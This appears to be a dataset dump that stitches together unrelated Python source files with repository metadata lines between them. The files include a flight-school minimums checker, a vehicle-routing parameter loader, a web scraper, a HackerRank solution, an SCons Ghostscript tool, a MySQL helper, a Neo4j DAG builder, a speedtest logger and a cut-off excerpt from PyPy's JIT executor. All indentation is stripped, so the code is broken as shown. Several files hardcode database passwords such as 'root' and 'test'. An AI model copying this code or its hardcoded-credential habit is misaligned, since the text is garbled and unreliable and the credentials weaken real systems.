the student's identifier, last name, and first name. The remaining elements are all
timestamps indicating the following in order: time joining the school, time of first
solo, time of private license, time of 50 hours certification, time of instrument
rating, time of advanced endorsement, and time of multiengine endorsement.
Parameter takeoff: The takeoff time of this flight
Precondition: takeoff is a datetime object
Parameter student: The student pilot
Precondition: student is 10-element list of strings representing a pilot
"""
if student[8] != '' and takeoff > utils.str_to_time(student[8]):
return True
else:
return False
def has_multiengine_endorsement(takeoff,student):
"""
Returns True if the student has an endorsement to fly an multiengine plane at the time of takeoff.
The function returns False otherwise.
Recall that a student is a 10-element list of strings. The first three elements are
the student's identifier, last name, and first name. The remaining elements are all
timestamps indicating the following in order: time joining the school, time of first
solo, time of private license, time of 50 hours certification, time of instrument
rating, time of advanced endorsement, and time of multiengine endorsement.
Parameter takeoff: The takeoff time of this flight
Precondition: takeoff is a datetime object
Parameter student: The student pilot
Precondition: student is 10-element list of strings representing a pilot
"""
if student[9] != '' and takeoff > utils.str_to_time(student[9]):
return True
else:
return False
def get_minimums(cert, area, instructed, vfr, daytime, minimums):
"""
Returns the most advantageous minimums for the given flight category.
The minimums is the 2-dimensional list (table) of minimums, including the header.
The header for this table is as follows:
CATEGORY CONDITIONS AREA TIME CEILING VISIBILITY WIND CROSSWIND
The values in the first four columns are strings, while the values in the last
four columns are numbers. CEILING is a measurement in ft, while VISIBILITY is in
miles. Both WIND and CROSSWIND are speeds in knots.
This function first searches the table for rows that match the function parameters.
It is possible for more than one row to be a match. A row is a match if ALL four
of the first four columns match.
The first column (CATEGORY) has values 'Student', 'Certified', '50 Hours', or 'Dual'.
If the value 'Student', it is a match if category is PILOT_STUDENT or higher. If
the value is 'Certified, it is a match if category is PILOT_CERTIFIED or higher. If
it is '50 Hours', it is only a match if category is PILOT_50_HOURS. The value 'Dual'
only matches if instructed is True.
The second column (CONDITIONS) has values 'VMC' and 'IMC'. A flight filed as VFR
(visual flight rules) is subject to VMC (visual meteorological conditions) minimums.
Similarly, a fight filed as IFR is subject to IMC minimums.
The third column (AREA) has values 'Pattern', 'Practice Area', 'Local',
'Cross Country', or 'Any'. Flights that are in the pattern or practice area match
'Local' as well. All flights match 'Any'.
The fourth column (TIME) has values 'Day' or 'Night'. The value 'Day' is only
a match if daytime is True. If it is False, 'Night' is the only match.
Once the function finds the all matching rows, it searches for the most advantageous
values for CEILING, VISIBILITY, WIND, and CROSSWIND. Lower values of CEILING and
VISIBILITY are better. Higher values for WIND and CROSSWIND are better. It then
returns this four values as a list of four floats (in the same order they appear)
in the table.
Example: Suppose minimums is the table
CATEGORY CONDITIONS AREA TIME CEILING VISIBILITY WIND CROSSWIND
Student VMC Pattern Day 2000 5 20 8
Student VMC Practice Area Day 3000 10 20 8
Certified VMC Local Day 3000 5 20 20
Certified VMC Practice Area Night 3000 10 20 10
50 Hours VMC Local Day 3000 10 20 10
Dual VMC Any Day 2000 10 30 10
Dual IMC Any Day 500 0.75 30 20
The call get_minimums(PILOT_CERTIFIED,'Practice Area',True,True,True,minimums) matches
all of the following rows:
Student VMC Practice Area Day 3000 10 20 8
Certified VMC Local Day 3000 5 20 20
Dual VMC Any Day 2000 10 30 10
The answer in this case is [2000,5,30,20]. 2000 and 5 are the least CEILING and
VISIBILITY values while 30 and 20 are the largest wind values.
If there are no rows that match the parameters (e.g. a novice pilot with no
instructor), this function returns None.
Parameter cert: The pilot certification
Precondition: cert is in int and one PILOT_NOVICE, PILOT_STUDENT, PILOT_CERTIFIED,
PILOT_50_HOURS, or PILOT_INVALID.
Parameter area: The flight area for this flight plan
Precondition: area is a string and one of 'Pattern', 'Practice Area' or 'Cross Country'
Parameter instructed: Whether an instructor is present
Precondition: instructed is a boolean
Parameter vfr: Whether the pilot has filed this as an VFR flight
Precondition: vfr is a boolean
Parameter daytime: Whether this flight is during the day
Precondition: daytime is boolean
Parameter minimums: The table of allowed minimums
Precondition: minimums is a 2d-list (table) as described above, including header
"""
# Find all rows that can apply to this student
# Find the best values for each column of the row
try:
category_matches = []
conditions_matches = []
area_matches = ['Any']
time_matches = []
#cert / CATEGORY
if cert == 1:
category_matches.append('Student')
elif cert == 2:
category_matches.append('Student')
category_matches.append('Certified')
elif cert == 3:
category_matches.append('Student')
category_matches.append('Certified')
category_matches.append('50 Hours')
#area / AREA
if area == 'Pattern':
area_matches.append(area)
area_matches.append('Local')
elif area == 'Practice Area':
area_matches.append(area)
area_matches.append('Local')
elif area == 'Cross Country':
area_matches.append(area)
#instructed / CATEGORY addition
if instructed == True:
category_matches.append('Dual')
#VFR / CONDITIONS
if vfr == True:
conditions_matches.append('VMC')
elif vfr == False:
conditions_matches.append('IMC')
#Daytime / TIME
if daytime == True:
time_matches.append('Day')
elif daytime == False:
time_matches.append('Night')
#FIND MATCHES
matches = []
for row in range(len(minimums)):
if minimums[row][0] in category_matches and minimums[row][1] in conditions_matches and minimums[row][2] in area_matches and minimums[row][3] in time_matches:
matches.append(minimums[row])
#create a list of mins as floats from matches
ceilings = []
for row in range(len(matches)):
ceilings.append(matches[row][4])
ceilings = [float(x) for x in ceilings]
visibilitys = []
for row in range(len(matches)):
visibilitys.append(matches[row][5])
visibilitys = [float(x) for x in visibilitys]
winds = []
for row in range(len(matches)):
winds.append(matches[row][6])
winds = [float(x) for x in winds]
crosswinds = []
for row in range(len(matches)):
crosswinds.append(matches[row][7])
crosswinds = [float(x) for x in crosswinds]
#GET BEST MINIMUMS from results
min_ceiling = min(ceilings)
min_visibility = min(visibilitys)
min_wind = max(winds)
min_crosswind = max(crosswinds)
return [min_ceiling, min_visibility, min_wind, min_crosswind]
except:
return None
| ChrisMJordan/eCornell_Cert_Project | pilots.py | pilots.py | py | 16,872 | python | en | code | 0 | github-code | 36 |
43589729276 | import numpy as np
import csv
import math
class param:
# Cardinalità minima di possol e negsol
minSol = 30
# Limite di cardinalità per possol e negsol
maxSol = 70
# Peso load excess
omega = 40
# Peso diversità (rispetto maxSol) (più è alto e meno pesa)
muelite = 1.5
# Probabilità riparazione soluzioni infeasible
Prep = 0.5
# Numero massimo di iterazioni senza improvements
itMax = 2000
# Iterazioni (rispetto itMax) prima di diversification
itDiv = 0.4
# Percentuale nodi da considerare vicini nell'education
near = 0.2
# Percentuali di individui da considerare vicini nel calcolo di diversità
muclose = 1
generation_size = maxSol - minSol
csi_ref = 0.2
def __init__(self, filename, minSol, maxSol, omega, muelite, prep, itMax, itDiv, near, muclose):
self.filename = filename
self.minSol = minSol
self.maxSol = maxSol
self.omega = omega
self.muelite = muelite
self.Prep = prep
self.itMax = itMax
self.itDiv = itDiv
self.near = near
self.muclose = muclose
with open(filename) as tsv:
readpos = False
readdemand = False
i = -1
j = -1
for line in csv.reader(tsv, dialect="excel-tab"):
if line[0].startswith("NODE_COORD_SECTION"):
readpos = True
if line[0].startswith("DEMAND_SECTION"):
readpos = False
readdemand = True
if line[0].startswith("DEPOT_SECTION"):
readdemand = False
if line[0].startswith("DIMENSION"):
self.n = int(line[1])
self.demand = np.zeros(self.n, dtype=int)
self.pos = np.zeros((self.n + 1, 2), dtype=int)
if line[0].startswith("CAPACITY"):
self.C = int(line[1])
if readpos:
if i != -1:
self.pos[i][0] = line[1]
self.pos[i][1] = line[2]
i += 1
if readdemand:
if j != -1:
self.demand[j] = int(line[1])
j += 1
self.dist = np.zeros((self.n, self.n), dtype=int)
for i in range(self.n):
for j in range(self.n):
self.dist[i][j] = int(round(math.sqrt(math.pow(
self.pos[i][0] - self.pos[j][0], 2) + math.pow(self.pos[i][1] - self.pos[j][1], 2))))
self.neigh = []
numNeigh = int(self.n*self.near)
for i in range(1, self.n):
auxdist = list(self.dist[i])
auxdist[i] = math.inf
for k in range(numNeigh):
j = auxdist.index(min(auxdist))
self.neigh.append([i, j])
auxdist[j] = math.inf
def printparam(self):
print("filename: ", self.filename)
print("minsol: ", self.minSol)
print("maxsol: ", self.maxSol)
print("omega: ", self.omega)
print("muelite: ", self.muelite)
print("Prep: ", self.Prep)
print("itMax: ", self.itMax)
print("itDiv: ", self.itDiv)
print("near: ", self.near)
print("muclose: ", self.muclose)
def printonfile(self, filename):
myfile = open(filename, 'a')
myfile.write("filename: ")
myfile.write(self.filename)
myfile.write("\nminsol: ")
myfile.write(str(self.minSol))
myfile.write("\nmaxsol: ")
myfile.write(str(self.maxSol))
myfile.write("\nomega: ")
myfile.write(str(self.omega))
myfile.write("\nmuelite: ")
myfile.write(str(self.muelite))
myfile.write("\nPrep: ")
myfile.write(str(self.Prep))
myfile.write("\nitMax: ")
myfile.write(str(self.itMax))
myfile.write("\nitDiv: ")
myfile.write(str(self.itDiv))
myfile.write("\nnear: ")
myfile.write(str(self.near))
myfile.write("\nmuclose: ")
myfile.write(str(self.muclose))
myfile.close()
| neeco1991/uhgs | param.py | param.py | py | 4,170 | python | en | code | 2 | github-code | 36 |
30221585975 | from bs4 import BeautifulSoup
import requests
import csv
import pandas as pd
import os
source = requests.get('https://www.centuryply.com/centurylaminates/')
soup = BeautifulSoup(source.content, 'lxml')
for main in soup.select('li.dropdown-submenu'):
for a_link in main.find_all('a'):
try:
t_link = a_link['href'].replace('#','')
f_name = t_link.replace('.php','')
m_link = f'https://www.centuryply.com/centurylaminates/{t_link}'
folder_location = f'./data/{f_name}'
if not os.path.exists(folder_location):
os.mkdir(folder_location)
source = requests.get(m_link)
soup = BeautifulSoup(source.content, 'lxml')
for src in soup.find_all('div',class_='product-meta'):
links = src.a
link =links.find_next('a')['href']
link = f'https://www.centuryply.com/centurylaminates/{link}'
#print(link)
source = requests.get(link)
soup = BeautifulSoup(source.content, 'lxml')
print(f'>> {link}')
img = soup.find('div',class_='product-img').a['bg-image']
prod_img = f'https://www.centuryply.com/centurylaminates/{img}'
print(prod_img)
name = soup.find('div',class_='product-heading').h1.text
name = f' {name} '
print(name)
desc = soup.find('div',class_='product-description').p.text
print(desc)
f_name = name.replace(' ','_')
filenames = f'{folder_location}/{f_name}.csv'
with open(filenames , 'w') as csv_file:
csv_writer = csv.writer(csv_file)
csv_writer.writerow(['Prod_link ',' Name ',' Images ', ' Prod_Desc '])
csv_writer.writerow([link , name , prod_img , desc])
print(csv_file.closed)
except:
print('')
| jhankarnarang/Century-Plywood-Web-Scraping | Century Laminates/main.py | main.py | py | 2,060 | python | en | code | 0 | github-code | 36 |
14713582650 | #!/bin/python3
import math
import os
import random
import re
import sys
#
# Complete the 'plusMinus' function below.
#
# The function accepts INTEGER_ARRAY arr as parameter.
#
def plusMinus(arr):
length_of_arr = len(arr)
positive_count = 0
negative_count = 0
zero_count = 0
index = 0
for i in range(0, len(arr)):
if arr[index] > 0:
positive_count += 1
elif arr[index] == 0:
zero_count += 1
elif arr[index] < 0:
negative_count += 1
else:
pass
index += 1
positive_percentage = positive_count / length_of_arr
negative_percentage = negative_count / length_of_arr
zero_percentage = zero_count / length_of_arr
print(positive_percentage)
print(negative_percentage)
print(zero_percentage)
if __name__ == '__main__':
n = int(input().strip())
arr = list(map(int, input().rstrip().split()))
plusMinus(arr)
| AndrewDass1/HACKERRANK-PROBLEM-SOLUTIONS | Interview Preparation Kits/1 Week Preparation Kit/plus_minus_solution.py | plus_minus_solution.py | py | 969 | python | en | code | 0 | github-code | 36 |
36947774959 | __revision__ = "src/engine/SCons/Tool/gs.py bee7caf9defd6e108fc2998a2520ddb36a967691 2019-12-17 02:07:09 bdeegan"
import SCons.Action
import SCons.Builder
import SCons.Platform
import SCons.Util
# Ghostscript goes by different names on different platforms...
platform = SCons.Platform.platform_default()
if platform == 'os2':
gs = 'gsos2'
elif platform == 'win32':
gs = 'gswin32c'
else:
gs = 'gs'
GhostscriptAction = None
def generate(env):
"""Add Builders and construction variables for Ghostscript to an
Environment."""
global GhostscriptAction
# The following try-except block enables us to use the Tool
# in standalone mode (without the accompanying pdf.py),
# whenever we need an explicit call of gs via the Gs()
# Builder ...
try:
if GhostscriptAction is None:
GhostscriptAction = SCons.Action.Action('$GSCOM', '$GSCOMSTR')
from SCons.Tool import pdf
pdf.generate(env)
bld = env['BUILDERS']['PDF']
bld.add_action('.ps', GhostscriptAction)
except ImportError as e:
pass
gsbuilder = SCons.Builder.Builder(action = SCons.Action.Action('$GSCOM', '$GSCOMSTR'))
env['BUILDERS']['Gs'] = gsbuilder
env['GS'] = gs
env['GSFLAGS'] = SCons.Util.CLVar('-dNOPAUSE -dBATCH -sDEVICE=pdfwrite')
env['GSCOM'] = '$GS $GSFLAGS -sOutputFile=$TARGET $SOURCES'
def exists(env):
if 'PS2PDF' in env:
return env.Detect(env['PS2PDF'])
else:
return env.Detect(gs) or SCons.Util.WhereIs(gs)
# Local Variables:
# tab-width:4
# indent-tabs-mode:nil
# End:
# vim: set expandtab tabstop=4 shiftwidth=4:
| mongodb/mongo | src/third_party/scons-3.1.2/scons-local-3.1.2/SCons/Tool/gs.py | gs.py | py | 1,659 | python | en | code | 24,670 | github-code | 36 |
37088074525 | # -*- coding: utf-8 -*-
import MySQLdb as MySQL # pip install mysqlclient
class WorkWithDb:
def __init__(self):
pass
def perform_connection(self):
try_connection_count = 0
print("Подключение к базе...")
while try_connection_count <= 3:
try:
self.db = MySQL.connect(host="127.0.0.1", user="root", passwd="root", db="lazy24", charset="utf8mb4")
print("Установлено соединение")
try_connection_count = 0
return True
except Exception:
try_connection_count += 1
if try_connection_count <= 3:
print(f"Не удается подключиться к базе, выполняется попытка подключиться"
f" № {try_connection_count}...")
else:
print("!!! Ошибка: Проблема с подключением к базе. Проверьте ваше интернет соединение")
return False
def close_connection(self):
self.db.close()
def load_data(self, text_query):
try_count = 0
with self.db.cursor() as cur:
try:
# Запрос на получение данных
cur.execute(text_query)
# Извлечение данных
self.data = cur.fetchall()
print("Данные загружены")
except Exception:
print(f"Нет подключения к базе, выполняется попытка подключиться...")
if self.perform_connection():
self.load_data(text_query)
def insert_data(self, data):
with self.db.cursor() as cur:
try:
# Запрос на занесение данных
cur.execute(data)
# Подтверждение
self.db.commit()
cur.close()
except Exception:
print(f"Нет подключения к базе, выполняется попытка подключиться...")
if self.perform_connection():
self.load_data(data)
def load_column_data(self, shipments_name):
with self.db.cursor() as cur:
try:
# Получаем названия столбцов таблицы
cur.execute = cur.execute("""SHOW COLUMNS FROM {};""".format(shipments_name))
columns_names = cur.fetchall()
self.columns_names = [item[0] for item in columns_names]
print("Название колонок загружено")
cur.close()
except Exception:
print("Нет подключения к базе, выполняется попытка подключиться...")
if self.perform_connection():
self.load_column_data(shipments_name)
def get_data(self):
return self.data
def get_columns_names(self):
return self.columns_names
| Swarmi24/Lazy24 | workwithdb.py | workwithdb.py | py | 3,260 | python | ru | code | 0 | github-code | 36 |
30397116642 | from dagger import conf
from dagger.dag_creator.graph_traverser_base import GraphTraverserBase
from dagger.graph.task_graph import Graph
from dagger.utilities import uid
from neo4j import GraphDatabase
class DagCreator(GraphTraverserBase):
def __init__(self, task_graph: Graph):
super().__init__(task_graph, True)
neo4j_uri = "bolt://{host}:{port}".format(
host=conf.NE4J_HOST, port=conf.NE4J_PORT
)
self._neo4j_driver = GraphDatabase.driver(neo4j_uri, auth=("neo4j", "test"))
with self._neo4j_driver.session() as session:
session.write_transaction(self._reset_graph)
@staticmethod
def _reset_graph(tx):
tx.run("MATCH ()-[r]->() DELETE r")
tx.run("MATCH (n) DELETE n")
@staticmethod
def _add_node(tx, node_type: str, **kwargs):
node_args = ", ".join([f'{key}:"{value}"' for key, value in kwargs.items()])
create_cmd = f"CREATE (node:{node_type} {{{node_args}}}) RETURN node"
result = tx.run(create_cmd)
return result.single()['node'].id
@staticmethod
def _add_edge(tx, from_id: int, to_id: int, relationship_type: str, **kwargs):
relationship_args = ", ".join(
[f'{key}:"{value}"' for key, value in kwargs.items()]
)
create_cmd = f"""
MATCH (from_node), (to_node)
WHERE ID(from_node)={from_id} AND ID(to_node)={to_id}
CREATE (from_node)-[:{relationship_type} {{{relationship_args}}}]->(to_node)
"""
tx.run(create_cmd)
def _create_dag(self, pipe_id, node):
with self._neo4j_driver.session() as session:
node_id = session.write_transaction(
self._add_node,
"Dag",
name=node.obj.name,
description=node.obj.description,
uid=uid.get_pipeline_uid(node.obj)
)
return node_id
def _create_job_task(self, node):
with self._neo4j_driver.session() as session:
node_id = session.write_transaction(
self._add_node,
"Job",
name=node.obj.name,
description=node.obj.description,
uid=uid.get_task_uid(node.obj)
)
pipe_id = node.obj.pipeline_name
with self._neo4j_driver.session() as session:
session.write_transaction(
self._add_edge, node_id, self._dags[pipe_id], "TASK_OF"
)
return node_id
def _create_data_task(self, pipe_id, node):
# if pipe_id not in self._data_tasks:
# self._data_tasks[pipe_id] = {}
dataset_id = node.obj.airflow_name
if dataset_id not in self._data_tasks:
with self._neo4j_driver.session() as session:
self._data_tasks[dataset_id] = session.write_transaction(
self._add_node,
"Dataset",
name=node.obj.alias(),
description=node.obj.name,
uid=uid.get_dataset_uid(node.obj)
)
def _create_edge_without_data(self, from_task_id, to_task_ids, node):
raise NotImplemented
def _create_edge_with_data(self, from_task_id, to_task_ids, node):
from_pipe = (
self._task_graph.get_node(from_task_id).obj.pipeline_name
if from_task_id
else None
)
data_id = node.obj.airflow_name
if from_pipe:
with self._neo4j_driver.session() as session:
session.write_transaction(
self._add_edge,
self._tasks[from_task_id],
self._data_tasks[data_id],
"GENERATED_BY",
)
for to_task_id in to_task_ids:
to_pipe = self._task_graph.get_node(to_task_id).obj.pipeline_name
with self._neo4j_driver.session() as session:
session.write_transaction(
self._add_edge,
self._data_tasks[data_id],
self._tasks[to_task_id],
"DEPENDS_ON",
)
| siklosid/dagger | dagger/dag_creator/neo4j/dag_creator.py | dag_creator.py | py | 4,182 | python | en | code | 7 | github-code | 36 |
17092139917 | import os
import speedtest_cli as speedtest
import datetime
import sqlite3
import time
from sqlite3 import Error
from xml.etree import ElementTree
from xml.etree.ElementTree import Element
from xml.etree.ElementTree import SubElement
try:
urltocheck = os.environ['UPCHECK_URLTOCHECK']
except os.error as e:
print(e)
exit(1)
try:
dbfile = os.environ['UPCHECK_DB_LOCATION']
except os.error as e:
print(e)
exit(1)
def dbconnect(dbfile):
try:
connection = sqlite3.connect(dbfile)
print(sqlite3.version)
connection.close()
except Error as t:
print(t)
exit(1)
def db_createtable(dbfile):
try:
connection = sqlite3.connect(dbfile)
cursor = connection.cursor()
sql = 'CREATE TABLE IF NOT EXISTS upcheck (record_number integer PRIMARY KEY AUTOINCREMENT, timestamp TIMESTAMP, download INTEGER, upload INTEGER, ping INTEGER)'
cursor.execute(sql)
except Error as t:
print(t)
exit(1)
def write_out_record(dbfile, timestamp, download, upload, ping):
try:
connection = sqlite3.connect(dbfile, detect_types=sqlite3.PARSE_DECLTYPES)
cursor = connection.cursor()
cursor.execute("INSERT INTO upcheck VALUES (NULL, ?, ?, ?, ?)", (timestamp, download, upload, ping))
connection.commit()
connection.close()
except Error as t:
print(t)
def average(input):
return sum(input) / len(input)
def get_average_data():
connection = sqlite3.connect(dbfile, detect_types=sqlite3.PARSE_DECLTYPES)
cursor = connection.cursor()
yesterday = (datetime.datetime.now()) - (datetime.timedelta(days=1))
cursor.execute("SELECT download FROM upcheck WHERE timestamp > ?", (yesterday,))
results = cursor.fetchall()
selected_results = []
for result in results:
selected_results.append(result[0])
speedtest_dl_averrage = average(selected_results)
speedtest_dl_averrage = round(speedtest_dl_averrage,2)
cursor.execute("SELECT upload FROM upcheck WHERE timestamp > ?", (yesterday,))
results = cursor.fetchall()
selected_results = []
for result in results:
selected_results.append(result[0])
speedtest_ul_average = average(selected_results)
speedtest_ul_average = round(speedtest_ul_average,2)
cursor.execute("SELECT ping FROM upcheck WHERE timestamp > ?", (yesterday,))
results = cursor.fetchall()
selected_results = []
for result in results:
selected_results.append(result[0])
speedtest_ping_average = average(selected_results)
speedtest_ping_average = round(speedtest_ping_average,2)
average_array = []
average_array.append(speedtest_dl_averrage)
average_array.append(speedtest_ul_average)
average_array.append(speedtest_ping_average)
return average_array
def run_speedtest():
stest = speedtest.Speedtest()
stest.get_servers()
stest.get_best_server()
stest.download()
stest.upload()
return stest.results
def bits_to_bytes(inputvalue):
bits = inputvalue
megabits = bits / 1000000
megabits = format(megabits, '.2f')
return megabits
def primary_operation():
print("Running Speedtest")
stest_result = run_speedtest()
download_speed = str(bits_to_bytes(stest_result.download))
upload_speed = str(bits_to_bytes(stest_result.upload))
ping = str(stest_result.ping)
timestamp = datetime.datetime.now()
write_out_record(dbfile, timestamp, download_speed, upload_speed, ping)
average_dl = str(get_average_data()[0])
average_ul = str(get_average_data()[1])
average_ping = str(get_average_data()[2])
xml_root = Element('SpeedtestResults')
SubElement(xml_root, "average_dl").text = average_dl
SubElement(xml_root, "average_ul").text = average_ul
SubElement(xml_root, "average_ping").text = average_ping
xml_output = ElementTree.tostring(xml_root, encoding='unicode')
xml_output_file = open(xml_web_output, "w+")
xml_output_file.write(xml_output)
xml_web_output = "/usr/share/nginx/html/upcheck-speedtest.xml"
try:
dbconnect(dbfile)
except Error as e:
print("Could not connect to database")
print(e)
exit(1)
try:
db_createtable(dbfile)
print("UpCheck Scheduled Tasks are Active")
except Error as e:
print("Unable to Create Table")
print(e)
exit(1)
while True:
primary_operation()
time.sleep(3000)
| overallcoma/upcheck | upcheck-client/upcheck-client-scheduledtasks.py | upcheck-client-scheduledtasks.py | py | 4,428 | python | en | code | 0 | github-code | 36 |
43301296714 | """This implements pyjitpl's execution of operations.
"""
from rpython.rtyper.lltypesystem import lltype, rstr, llmemory
from rpython.rlib.rarithmetic import ovfcheck, r_longlong, is_valid_int
from rpython.rlib.unroll import unrolling_iterable
from rpython.rlib.objectmodel import specialize
from rpython.rlib.debug import fatalerror
from rpython.jit.metainterp.history import check_descr
from rpython.jit.metainterp.history import INT, REF, FLOAT, VOID, AbstractDescr
from rpython.jit.metainterp.history import ConstInt, ConstFloat, ConstPtr
from rpython.jit.metainterp import resoperation
from rpython.jit.metainterp.resoperation import rop, opname
from rpython.jit.metainterp.blackhole import BlackholeInterpreter, NULL
from rpython.jit.codewriter import longlong
# ____________________________________________________________
@specialize.arg(4)
def _do_call(cpu, metainterp, argboxes, descr, rettype):
assert metainterp is not None
# count the number of arguments of the different types
count_i = count_r = count_f = 0
for i in range(1, len(argboxes)):
type = argboxes[i].type
if type == INT: count_i += 1
elif type == REF: count_r += 1
elif type == FLOAT: count_f += 1
# allocate lists for each type that has at least one argument
if count_i: args_i = [0] * count_i
else: args_i = None
if count_r: args_r = [NULL] * count_r
else: args_r = None
if count_f: args_f = [longlong.ZEROF] * count_f
else: args_f = None
# fill in the lists
count_i = count_r = count_f = 0
for i in range(1, len(argboxes)):
box = argboxes[i]
if box.type == INT:
args_i[count_i] = box.getint()
count_i += 1
elif box.type == REF:
args_r[count_r] = box.getref_base()
count_r += 1
elif box.type == FLOAT:
args_f[count_f] = box.getfloatstorage()
count_f += 1
# get the function address as an integer
func = argboxes[0].getint()
# do the call using the correct function from the cpu
if rettype == INT:
try:
result = cpu.bh_call_i(func, args_i, args_r, args_f, descr)
except Exception as e:
metainterp.execute_raised(e)
result = 0
return result
if rettype == REF:
try:
result = cpu.bh_call_r(func, args_i, args_r, args_f, descr)
except Exception as e:
metainterp.execute_raised(e)
result = NULL
return result
if rettype == FLOAT:
try:
result = cpu.bh_call_f(func, args_i, args_r, args_f, descr)
except Exception as e:
metainterp.execute_raised(e)
result = longlong.ZEROF
return result
if rettype == VOID:
try:
cpu.bh_call_v(func, args_i, args_r, args_f, descr)
except Exception as e:
metainterp.execute_raised(e)
return None
raise AssertionError("bad rettype")
def new_do_call(rettype):
def do_call(cpu, metainterp, argboxes, descr):
return _do_call(cpu, metainterp, argboxes, descr, rettype)
do_call.__name__ = "do_call_" + rettype
return do_call
do_call_r = new_do_call("r")
do_call_i = new_do_call("i")
do_call_f = new_do_call("f")
do_call_n = new_do_call("v")
do_call_loopinvariant_r = do_call_r
do_call_loopinvariant_i = do_call_i
do_call_loopinvariant_f = do_call_f
do_call_loopinvariant_n = do_call_n
do_call_may_force_r = do_call_r
do_call_may_force_i = do_call_i
do_call_may_force_f = do_call_f
do_call_may_force_n = do_call_n
def do_cond_call(cpu, metainterp, argboxes, descr):
condbox = argboxes[0]
if condbox.getint():
do_call_n(cpu, metainterp, argboxes[1:], descr)
def do_cond_call_value_i(cpu, metainterp, argboxes, descr):
value = argboxes[0].getint()
if value == 0:
value = do_call_i(cpu, metainterp, argboxes[1:], descr)
return value
def do_cond_call_value_r(cpu, metainterp, argboxes, descr):
value = argboxes[0].getref_base()
if not value:
value = do_call_r(cpu, metainterp, argboxes[1:], descr)
return value
def do_getarrayitem_gc_i(cpu, _, arraybox, indexbox, arraydescr):
array = arraybox.getref_base()
index = indexbox.getint()
return cpu.bh_getarrayitem_gc_i(array, index, arraydescr)
def do_getarrayitem_gc_r(cpu, _, arraybox, indexbox, arraydescr):
array = arraybox.getref_base()
index = indexbox.getint()
return cpu.bh_getarrayitem_gc_r(array, index, arraydescr)
def do_getarrayitem_gc_f(cpu, _, arraybox, indexbox, arraydescr):
array = arraybox.getref_base()
index = indexbox.getint()
return cpu.bh_getarrayitem_gc_f(array, index, arraydescr)
def do_getarrayitem_raw_i(cpu, _, arraybox, indexbox, arraydescr):
array = arraybox.getint()
index = indexbox.getint()
return cpu.bh_getarrayitem_raw_i(array, index, arraydescr)
def do_getarrayitem_raw_f(cpu, _, arraybox, indexbox, arraydescr):
array = arraybox.getint()
index = indexbox.getint()
return cpu.bh_getarrayitem_raw_f(array, index, arraydescr)
def do_setarrayitem_gc(cpu, _, arraybox, indexbox, itembox, arraydescr):
array = arraybox.getref_base()
index = indexbox.getint()
if arraydescr.is_array_of_pointers():
cpu.bh_setarrayitem_gc_r(array, index, itembox.getref_base(),
arraydescr)
elif arraydescr.is_array_of_floats():
cpu.bh_setarrayitem_gc_f(array, index, itembox.getfloatstorage(),
arraydescr)
else:
cpu.bh_setarrayitem_gc_i(array, index, itembox.getint(), arraydescr)
def do_setarrayitem_raw(cpu, _, arraybox, indexbox, itembox, arraydescr):
array = arraybox.getint()
index = indexbox.getint()
assert not arraydescr.is_array_of_pointers()
if arraydescr.is_array_of_floats():
cpu.bh_setarrayitem_raw_f(array, index, itembox.getfloatstorage(),
arraydescr)
else:
cpu.bh_setarrayitem_raw_i(array, index, itembox.getint(), arraydescr)
def do_getinteriorfield_gc(cpu, _, arraybox, indexbox, descr):
raise Exception("implement me")
xxxx
array = arraybox.getref_base()
index = indexbox.getint()
if descr.is_pointer_field():
return BoxPtr(cpu.bh_getinteriorfield_gc_r(array, index, descr))
elif descr.is_float_field():
return BoxFloat(cpu.bh_getinteriorfield_gc_f(array, index, descr))
else:
return BoxInt(cpu.bh_getinteriorfield_gc_i(array, index, descr))
def do_setinteriorfield_gc(cpu, _, arraybox, indexbox, valuebox, descr):
array = arraybox.getref_base()
index = indexbox.getint()
if descr.is_pointer_field():
cpu.bh_setinteriorfield_gc_r(array, index, valuebox.getref_base(),
descr)
elif descr.is_float_field():
cpu.bh_setinteriorfield_gc_f(array, index, valuebox.getfloatstorage(),
descr)
else:
cpu.bh_setinteriorfield_gc_i(array, index, valuebox.getint(), descr)
def do_getfield_gc_i(cpu, _, structbox, fielddescr):
struct = structbox.getref_base()
return cpu.bh_getfield_gc_i(struct, fielddescr)
def do_getfield_gc_r(cpu, _, structbox, fielddescr):
struct = structbox.getref_base()
return cpu.bh_getfield_gc_r(struct, fielddescr)
def do_getfield_gc_f(cpu, _, structbox, fielddescr):
struct = structbox.getref_base()
return cpu.bh_getfield_gc_f(struct, fielddescr)
def do_getfield_raw_i(cpu, _, structbox, fielddescr):
check_descr(fielddescr)
struct = structbox.getint()
return cpu.bh_getfield_raw_i(struct, fielddescr)
def do_getfield_raw_f(cpu, _, structbox, fielddescr):
check_descr(fielddescr)
struct = structbox.getint()
return cpu.bh_getfield_raw_f(struct, fielddescr)
def do_getfield_raw_r(cpu, _, structbox, fielddescr):
check_descr(fielddescr)
struct = structbox.getint()
return cpu.bh_getfield_raw_r(struct, fielddescr)
def do_setfield_gc(cpu, _, structbox, itembox, fielddescr):
struct = structbox.getref_base()
if fielddescr.is_pointer_field():
cpu.bh_setfield_gc_r(struct, itembox.getref_base(), fielddescr)
elif fielddescr.is_float_field():
cpu.bh_setfield_gc_f(struct, itembox.getfloatstorage(), fielddescr)
else:
cpu.bh_setfield_gc_i(struct, itembox.getint(), fielddescr)
def do_setfield_raw(cpu, _, structbox, itembox, fielddescr):
struct = structbox.getint()
assert not fielddescr.is_pointer_field()
if fielddescr.is_float_field():
cpu.bh_setfield_raw_f(struct, itembox.getfloatstorage(), fielddescr)
else:
cpu.bh_setfield_raw_i(struct, itembox.getint(), fielddescr)
def do_raw_store(cpu, _, addrbox, offsetbox, valuebox, arraydescr):
addr = addrbox.getint()
offset = offsetbox.getint()
if arraydescr.is_array_of_pointers():
raise AssertionError("cannot store GC pointers in raw store")
elif arraydescr.is_array_of_floats():
cpu.bh_raw_store_f(addr, offset, valuebox.getfloatstorage(),arraydescr)
else:
cpu.bh_raw_store_i(addr, offset, valuebox.getint(), arraydescr)
def do_raw_load(cpu, _, addrbox, offsetbox, arraydescr):
raise Exception("implement me")
xxx
addr = addrbox.getint()
offset = offsetbox.getint()
if arraydescr.is_array_of_pointers():
raise AssertionError("cannot store GC pointers in raw store")
elif arraydescr.is_array_of_floats():
return BoxFloat(cpu.bh_raw_load_f(addr, offset, arraydescr))
else:
return BoxInt(cpu.bh_raw_load_i(addr, offset, arraydescr))
def do_gc_store_indexed(cpu, _, addrbox, indexbox, valuebox, scalebox,
base_ofsbox, bytesbox, arraydescr):
addr = addrbox.getref_base()
index = indexbox.getint()
scale = scalebox.getint()
base_ofs = base_ofsbox.getint()
bytes = bytesbox.getint()
if arraydescr.is_array_of_pointers():
